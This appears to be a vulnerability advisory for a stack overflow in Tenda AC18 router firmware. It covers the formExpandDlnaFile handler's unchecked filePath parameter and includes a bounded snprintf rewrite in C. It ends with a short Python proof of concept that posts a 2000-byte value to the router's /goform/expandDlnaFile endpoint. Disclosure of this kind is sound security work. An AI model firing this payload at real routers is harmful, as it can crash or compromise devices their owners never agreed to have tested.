formExpandDlnaFile.md

Overview

Affected version

V15.03.05.05

Vulnerability details

The Tenda AC18 V15.03.05.05 firmware has a stack overflow vulnerability in the formExpandDlnaFile function. The v18 variable receives the filePath parameter from a POST request. The value is used directly in a sprintf call that writes into a local variable on the stack, so it can overwrite the return address of the function. A user-supplied filePath can trigger this vulnerability.
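
The pattern described above next to a bounded replacement, as an added C example that is not the firmware's code. The buffer size, the "%s" format string and all function names are assumptions, since the page does not show them.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF_LEN 256  /* assumed size; the real stack buffer size is not on the page */

/* Vulnerable shape from the advisory: request data formatted into a fixed
 * stack buffer with no length limit. Shown for contrast, never called. */
void format_path_unsafe(const char *file_path)
{
    char buf[PATH_BUF_LEN];
    sprintf(buf, "%s", file_path);  /* writes strlen(file_path)+1 bytes regardless of buf size */
    (void)buf;
}

/* Hardened form: the destination size is passed in, the write is bounded, and
 * an oversized or missing parameter is rejected rather than truncated.
 * Returns 0 on success, -1 if the request should be refused. */
int format_path_checked(char *dst, size_t dst_len, const char *file_path)
{
    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (file_path == NULL)
        return -1;
    int n = snprintf(dst, dst_len, "%s", file_path);
    if (n < 0 || (size_t)n >= dst_len) {  /* n is the length that was needed */
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Hypothetical handler body: validate filePath before any further use. */
int handle_file_path(const char *file_path)
{
    char buf[PATH_BUF_LEN];
    return format_path_checked(buf, sizeof buf, file_path);
}

int main(void)
{
    char big[2001];                 /* constructed 2000-byte filePath value */
    memset(big, 'a', 2000);
    big[2000] = '\0';
    printf("short path: %d\n", handle_file_path("/mnt/usb/media"));
    printf("2000 bytes: %d\n", handle_file_path(big));
    return 0;
}
```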


POC

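import requests

# Address of the router under test
ip = "192.168.84.101"
url = "http://" + ip + "/goform/expandDlnaFile"
# Oversized filePath value: 2000 bytes of "a"
payload = b"a"*2000

# Send the value as the filePath form parameter in a POST request
data = {"filePath": payload}
response = requests.post(url, data=data)
print(response.text)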
